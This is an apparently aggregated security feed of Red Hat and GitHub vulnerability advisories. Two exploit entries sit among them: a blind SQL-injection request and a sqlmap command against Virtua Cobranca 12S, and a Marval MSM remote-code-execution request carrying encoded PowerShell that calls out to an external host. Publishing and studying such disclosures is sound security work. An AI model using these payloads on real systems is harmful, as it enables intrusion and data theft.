Red Hat Security Advisory 2022-5006-01 - Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation. This advisory covers the RPM packages for the release. Issues addressed include a traversal vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift Service Mesh 2.1.3 Containers security update  
Advisory ID:       RHSA-2022:5006-01  
Product:           Red Hat OpenShift Service Mesh  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5006  
Issue date:        2022-06-13  
CVE Names:         CVE-2018-25032 CVE-2021-3634 CVE-2021-3737   
                   CVE-2021-3981 CVE-2021-4189 CVE-2021-25219   
                   CVE-2021-38185 CVE-2021-43813 CVE-2022-1154   
                   CVE-2022-1271 CVE-2022-1650 CVE-2022-23772   
                   CVE-2022-23773 CVE-2022-23806 CVE-2022-24675   
                   CVE-2022-24785 CVE-2022-28327 CVE-2022-29224   
                   CVE-2022-29225 CVE-2022-29226 CVE-2022-29228   
                   CVE-2022-31045   
=====================================================================

1. Summary:

Red Hat OpenShift Service Mesh 2.1.3.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio  
service mesh project, tailored for installation into an on-premise  
OpenShift Container Platform installation.

This advisory covers the RPM packages for the release.

Security Fix(es):

* eventsource: Exposure of Sensitive Information (CVE-2022-1650)  
* golang: crypto/elliptic IsOnCurve returns true for invalid field elements  
(CVE-2022-23806)  
* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)  
* Moment.js: Path traversal in moment.locale (CVE-2022-24785)  
* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements  
2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale  
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2085307 - CVE-2022-1650 eventsource: Exposure of Sensitive Information

5. JIRA issues fixed (https://issues.jboss.org/):

OSSM-1609 - Rebuild Kiali Server and Operator container 1.36 to pick up base image CVE fixes  
OSSM-1617 - Container release for Maistra 2.1.3

6. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2021-3634  
https://access.redhat.com/security/cve/CVE-2021-3737  
https://access.redhat.com/security/cve/CVE-2021-3981  
https://access.redhat.com/security/cve/CVE-2021-4189  
https://access.redhat.com/security/cve/CVE-2021-25219  
https://access.redhat.com/security/cve/CVE-2021-38185  
https://access.redhat.com/security/cve/CVE-2021-43813  
https://access.redhat.com/security/cve/CVE-2022-1154  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-1650  
https://access.redhat.com/security/cve/CVE-2022-23772  
https://access.redhat.com/security/cve/CVE-2022-23773  
https://access.redhat.com/security/cve/CVE-2022-23806  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-24785  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-29224  
https://access.redhat.com/security/cve/CVE-2022-29225  
https://access.redhat.com/security/cve/CVE-2022-29226  
https://access.redhat.com/security/cve/CVE-2022-29228  
https://access.redhat.com/security/cve/CVE-2022-31045  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqd659zjgjWX9erEAQifPxAAlxZB6rF/+H2JF2eHvJaWukV5e5ebEVUh  
Yh5nxUd2nWBtnm3ysQWDZBnJtbgLeQiwczp610K1wWWY7CEX/whFZp6V3OjTvyy5  
wmF9kIKW2Y8faKf0P4WzPgI2Z0eJoNVO4EbwDyrA2IHsiYRrVpLJAhhEpq7jWrK5  
NKs/v5Av7Y2wv5lJheU6vYWPnasXLVr+ufnD1hklYwj6UdKXsskRtRsafZvsxpye  
UOz7fFJjxub+q2w/QiOoUPQguoRZ7UsCYrFkjswA6rvJPQf9onyfEFouM9JTH+DE  
7KCyzMmSP8PTYlvZFAd+HPqRRBAZDm0LKK5jfU7kEAlMxUJocQQAbD2ea7StWABq  
DqIj+6k7+5UOpVY/bzqwU0PkxlBthTMhp6rLCLHbzzvhf4fZqsLJIXkb1WmgEOSq  
xmIAJ4nUGN3zdA9AJyhXMwcQz2sqz5VAZv5XBaDOYr5UnQWRiV3yK6Nw7hRA7elZ  
xgQlMRGKZjy8JCzD0pGtP0ns6sSBI3af/GBPhpZlQN3X5G94BRyj5f5AB/NDN6vV  
s1wXZxZVxXGwFplxgIrixoo/EONpkvVGjyFyEFdNmyoCAQ6o3CUyHXAYRWIactNY  
MAhvlMjncKZRu2O3/V5BRZhWA63NSL9FxZ+gj7w2NeNSj64ZmV6urLiL2V8DgLdh  
wW6jHTm7WOk=  
=NQsF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5006-01

Virtua Software Cobranca version 12S suffers from a remote SQL injection vulnerability.

    # Exploit Title: Virtua Software Cobranca 12S - SQLi# Shodan Query: http.favicon.hash:876876147# Date: 13/08/2021# Exploit Author: Luca Regne# Vendor Homepage: https://www.virtuasoftware.com.br/# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe# Version: 12S# Tested on: Windows Server 2019# CVE : CVE-2021-37589------------------------------------------------------------------------## Description A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter. ## Request PoC```POST /controller/login.php?acao=autenticar HTTP/1.1Host: redacted.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 37Connection: closeCookie: origem_selecionado=; PHPSESSID=idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario```This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error. ```POST /controller/login.php?acao=autenticar HTTP/1.1Host: redacted.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 37Connection: closeCookie: origem_selecionado=; PHPSESSID=idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario```## ExploitSave the request from burp to file ```bashpython3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent```

Virtua Software Cobranca 12S SQL Injection

Red Hat Security Advisory 2022-4993-01 - XZ Utils is an integrated collection of user-space file compression utilities based on the Lempel-Ziv-Markov chain algorithm, which performs lossless data compression. The algorithm provides a high compression ratio while keeping the decompression time short.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: xz security update  
Advisory ID:       RHSA-2022:4993-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4993  
Issue date:        2022-06-13  
CVE Names:         CVE-2022-1271   
=====================================================================

1. Summary:

An update for xz is now available for Red Hat Enterprise Linux 8.4 Extended  
Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v. 8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

XZ Utils is an integrated collection of user-space file compression  
utilities based on the Lempel-Ziv-Markov chain algorithm (LZMA), which  
performs lossless data compression. The algorithm provides a high  
compression ratio while keeping the decompression time short.

Security Fix(es):

* gzip: arbitrary-file-write vulnerability (CVE-2022-1271)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2073310 - CVE-2022-1271 gzip: arbitrary-file-write vulnerability

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
xz-5.2.4-4.el8_4.src.rpm

aarch64:  
xz-5.2.4-4.el8_4.aarch64.rpm  
xz-debuginfo-5.2.4-4.el8_4.aarch64.rpm  
xz-debugsource-5.2.4-4.el8_4.aarch64.rpm  
xz-devel-5.2.4-4.el8_4.aarch64.rpm  
xz-libs-5.2.4-4.el8_4.aarch64.rpm  
xz-libs-debuginfo-5.2.4-4.el8_4.aarch64.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_4.aarch64.rpm

ppc64le:  
xz-5.2.4-4.el8_4.ppc64le.rpm  
xz-debuginfo-5.2.4-4.el8_4.ppc64le.rpm  
xz-debugsource-5.2.4-4.el8_4.ppc64le.rpm  
xz-devel-5.2.4-4.el8_4.ppc64le.rpm  
xz-libs-5.2.4-4.el8_4.ppc64le.rpm  
xz-libs-debuginfo-5.2.4-4.el8_4.ppc64le.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_4.ppc64le.rpm

s390x:  
xz-5.2.4-4.el8_4.s390x.rpm  
xz-debuginfo-5.2.4-4.el8_4.s390x.rpm  
xz-debugsource-5.2.4-4.el8_4.s390x.rpm  
xz-devel-5.2.4-4.el8_4.s390x.rpm  
xz-libs-5.2.4-4.el8_4.s390x.rpm  
xz-libs-debuginfo-5.2.4-4.el8_4.s390x.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_4.s390x.rpm

x86_64:  
xz-5.2.4-4.el8_4.x86_64.rpm  
xz-debuginfo-5.2.4-4.el8_4.i686.rpm  
xz-debuginfo-5.2.4-4.el8_4.x86_64.rpm  
xz-debugsource-5.2.4-4.el8_4.i686.rpm  
xz-debugsource-5.2.4-4.el8_4.x86_64.rpm  
xz-devel-5.2.4-4.el8_4.i686.rpm  
xz-devel-5.2.4-4.el8_4.x86_64.rpm  
xz-libs-5.2.4-4.el8_4.i686.rpm  
xz-libs-5.2.4-4.el8_4.x86_64.rpm  
xz-libs-debuginfo-5.2.4-4.el8_4.i686.rpm  
xz-libs-debuginfo-5.2.4-4.el8_4.x86_64.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_4.i686.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_4.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v. 8.4):

aarch64:  
xz-debuginfo-5.2.4-4.el8_4.aarch64.rpm  
xz-debugsource-5.2.4-4.el8_4.aarch64.rpm  
xz-libs-debuginfo-5.2.4-4.el8_4.aarch64.rpm  
xz-lzma-compat-5.2.4-4.el8_4.aarch64.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_4.aarch64.rpm

ppc64le:  
xz-debuginfo-5.2.4-4.el8_4.ppc64le.rpm  
xz-debugsource-5.2.4-4.el8_4.ppc64le.rpm  
xz-libs-debuginfo-5.2.4-4.el8_4.ppc64le.rpm  
xz-lzma-compat-5.2.4-4.el8_4.ppc64le.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_4.ppc64le.rpm

s390x:  
xz-debuginfo-5.2.4-4.el8_4.s390x.rpm  
xz-debugsource-5.2.4-4.el8_4.s390x.rpm  
xz-libs-debuginfo-5.2.4-4.el8_4.s390x.rpm  
xz-lzma-compat-5.2.4-4.el8_4.s390x.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_4.s390x.rpm

x86_64:  
xz-debuginfo-5.2.4-4.el8_4.x86_64.rpm  
xz-debugsource-5.2.4-4.el8_4.x86_64.rpm  
xz-libs-debuginfo-5.2.4-4.el8_4.x86_64.rpm  
xz-lzma-compat-5.2.4-4.el8_4.x86_64.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqcmetzjgjWX9erEAQgHGQ//YVmUxftCwdG8Rr7gHPaGpxzWK83/x2Uo  
7c7zsDaSF88pOQx1LLOFd3Rc/NLyiHDcPUzwUjvHK5dgs122SPHm8OHEFnjEQHUx  
7vQ2pEBQz6zcv7WPh2AtfNTA9at6iythVmdnCL1qlTW1ym/t2rqAx6OiEfuaRL8p  
64Y80TEUrxXHTWOWYJytYQu3P3+JXC9Lcko/9FdZQcqNTBWeDxfH2M+gXy/oItRS  
dm65WwAQTsiTRZmVDFmdYP/ZgFEm4YS+bNVFEhZjDEO6OAMuVvtIrvCUpSASHDc8  
4GWbrEXZu5ytVP/5D9y1zghLAGawLVxqatyRCkksUzSSrhSrkl47RiS1ATRVtNsj  
TLvWxAyLs3KWRMFR6zjNMAEPalk31BR3wnafIKjHTuB9LYAKLVKMXxYvDwG4p1Gl  
dx8+/8j2axcGNOLCdGJCCy31SA4056+WfXeVbWYTQ/u+9CQCWFHdDvO9tBnzQNd7  
AWjQIdKfjH5/RbwUOMOYeSvMaR2FnvschK9aN6tywNm6dqGmPWPaIjdkIXQFPaOz  
1vZ4drx/K9VJdvBZr/rv6D0rdRBA4Tsl5jusQD1/RisXtnsMod9ti4xR/g/42XPv  
r2KsxXPQu0uvwGbgqQdcOnwmDCvGy8jCirCQNVBgyrIjsGT2ZxnTG2ABngNyd8l7  
V4EPEeodoiQ=  
=LHOY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4993-01

Red Hat Security Advisory 2022-4994-01 - XZ Utils is an integrated collection of user-space file compression utilities based on the Lempel-Ziv-Markov chain algorithm, which performs lossless data compression. The algorithm provides a high compression ratio while keeping the decompression time short.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: xz security update  
Advisory ID:       RHSA-2022:4994-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4994  
Issue date:        2022-06-13  
CVE Names:         CVE-2022-1271   
=====================================================================

1. Summary:

An update for xz is now available for Red Hat Enterprise Linux 8.1 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

XZ Utils is an integrated collection of user-space file compression  
utilities based on the Lempel-Ziv-Markov chain algorithm (LZMA), which  
performs lossless data compression. The algorithm provides a high  
compression ratio while keeping the decompression time short.

Security Fix(es):

* gzip: arbitrary-file-write vulnerability (CVE-2022-1271)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2073310 - CVE-2022-1271 gzip: arbitrary-file-write vulnerability

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
xz-5.2.4-4.el8_1.src.rpm

aarch64:  
xz-5.2.4-4.el8_1.aarch64.rpm  
xz-debuginfo-5.2.4-4.el8_1.aarch64.rpm  
xz-debugsource-5.2.4-4.el8_1.aarch64.rpm  
xz-devel-5.2.4-4.el8_1.aarch64.rpm  
xz-libs-5.2.4-4.el8_1.aarch64.rpm  
xz-libs-debuginfo-5.2.4-4.el8_1.aarch64.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_1.aarch64.rpm

ppc64le:  
xz-5.2.4-4.el8_1.ppc64le.rpm  
xz-debuginfo-5.2.4-4.el8_1.ppc64le.rpm  
xz-debugsource-5.2.4-4.el8_1.ppc64le.rpm  
xz-devel-5.2.4-4.el8_1.ppc64le.rpm  
xz-libs-5.2.4-4.el8_1.ppc64le.rpm  
xz-libs-debuginfo-5.2.4-4.el8_1.ppc64le.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_1.ppc64le.rpm

s390x:  
xz-5.2.4-4.el8_1.s390x.rpm  
xz-debuginfo-5.2.4-4.el8_1.s390x.rpm  
xz-debugsource-5.2.4-4.el8_1.s390x.rpm  
xz-devel-5.2.4-4.el8_1.s390x.rpm  
xz-libs-5.2.4-4.el8_1.s390x.rpm  
xz-libs-debuginfo-5.2.4-4.el8_1.s390x.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_1.s390x.rpm

x86_64:  
xz-5.2.4-4.el8_1.x86_64.rpm  
xz-debuginfo-5.2.4-4.el8_1.i686.rpm  
xz-debuginfo-5.2.4-4.el8_1.x86_64.rpm  
xz-debugsource-5.2.4-4.el8_1.i686.rpm  
xz-debugsource-5.2.4-4.el8_1.x86_64.rpm  
xz-devel-5.2.4-4.el8_1.i686.rpm  
xz-devel-5.2.4-4.el8_1.x86_64.rpm  
xz-libs-5.2.4-4.el8_1.i686.rpm  
xz-libs-5.2.4-4.el8_1.x86_64.rpm  
xz-libs-debuginfo-5.2.4-4.el8_1.i686.rpm  
xz-libs-debuginfo-5.2.4-4.el8_1.x86_64.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_1.i686.rpm  
xz-lzma-compat-debuginfo-5.2.4-4.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqcmc9zjgjWX9erEAQgqQRAAm/fGQamwzgXIr6dPxZTYZyCs6DLknzJE  
46CLEojxVLzJKbeoFmQ8GcPLqRPM6lAl+h1aAuIb9ucQuuEPHVZHUScDt55OZPmX  
jeB1Tofdz5qB/BsOgKZjGnCSF2JmBSsBYTKYsj+8n4IAWchT9GZpwwqLU49LIgEv  
H6oyEoJCz/UhMkZRtRpPKYvJs6+EA/FVfVkZ+LzVaLde4E67pqwW9kLH0laLIED1  
qszhimDN9DyqU0BZpEFK5vl2RpQkOSkxKN6BKvmAcGmM97EF2ePGyEzY+siUq9qD  
t8WC2D63myCPfHZMLbQSeJnfY7FSZEbEY5wvVPCVdZGPzqqzc2P5gyFkZralYSRg  
021Hr0cfjI3Sz4f/Hj+MYwJzGDEAKORY/vM3mBVE1aqHFMOd4s/a3T59GnLSX0qj  
NFUsL+qMYnx7Esnj4Y60+/O1fR4uCdPmK1kjiDYtj7aULHRC5/eO+c4c5pLI+5wk  
7RE2s1ghGKFqIXc9e4323KTPoGz9a8akBQRpafrgeVGPnWdT/PAdLQhnwN9vrv6a  
rrtSMoi2eQfHLZ8WYEfc6jLGdtxJED3tjXZEucGGnjrBt9vNqAFpMEvfPoBnhn6y  
bplL5p5/IkwZVKXK7urzdYhlObBC1MOb76E3ihYhh/TTo4/7lg437F3sfsY47OdD  
Lp0DiP3Y824=  
=OTzz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4994-01

Marval MSM version 14.19.0.12476 suffers from a remote code execution vulnerability.

    # Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)# Date: 27/5/2022# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: https://www.marvalnorthamerica.com/# Software Link: https://www.marvalnorthamerica.com/# Version: v14.19.0.12476# Tested on: Windows# Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rcePOST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2Host: MSMHandler.ioCookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: application/json, text/javascript, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestContent-Length: 456Origin: https://MSMHandler.ioDnt: 1Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstype=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true

Marval MSM 14.19.0.12476 Remote Code Execution

The got package before 12.1.0 for Node.js allows a redirect to a UNIX socket.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-33987

**Got allows a redirect to a UNIX socket**

Moderate severity GitHub Reviewed Published Jun 19, 2022 • Updated Jun 21, 2022

We are still processing this advisory. You may have affected repositories that are not yet on this list. Check back soon for more.

**Affected versions**

\>= 12.0.0, < 12.1.0

< 11.8.5

**Patched versions**

12.1.0

11.8.5

**Description**

GHSA-pfrx-2q88-qq97: Got allows a redirect to a UNIX socket

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-33987: Disable redirects to UNIX sockets by szmarczak · Pull Request #2047 · sindresorhus/got

All versions of package @discordjs/opus are vulnerable to Denial of Service (DoS) when trying to encode using an encoder with zero channels, or a non-initialized buffer. This leads to a hard crash.

**Uncontrolled Resource Consumption in @discordjs/opus**

High severity GitHub Reviewed Published Jun 18, 2022 • Updated Jun 20, 2022

GHSA-rvgf-69j7-xh78: Uncontrolled Resource Consumption in @discordjs/opus

This affects all versions of package mout. The deepFillIn function can be used to 'fill missing properties recursively', while the deepMixIn mixes objects into the target object, recursively mixing existing child objects as well. In both cases, the key used to access the target object recursively is not checked, leading to exploiting this vulnerability. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-7792](https://security.snyk.io/vuln/SNYK-JS-MOUT-1014544).

**Prototype Pollution in mout**

High severity GitHub Reviewed Published Jun 18, 2022 • Updated Jun 20, 2022

GHSA-vvv8-xw5f-3f88: Prototype Pollution in mout

All versions of package querymen are vulnerable to Prototype Pollution if the parameters of exported function handler(type, name, fn) can be controlled by users without any sanitization. Note: This vulnerability derives from an incomplete fix of [CVE-2020-7600](https://security.snyk.io/vuln/SNYK-JS-QUERYMEN-559867).

**Prototype Pollution in querymen**

Moderate severity GitHub Reviewed Published Jun 18, 2022 • Updated Jun 20, 2022

Tag

#js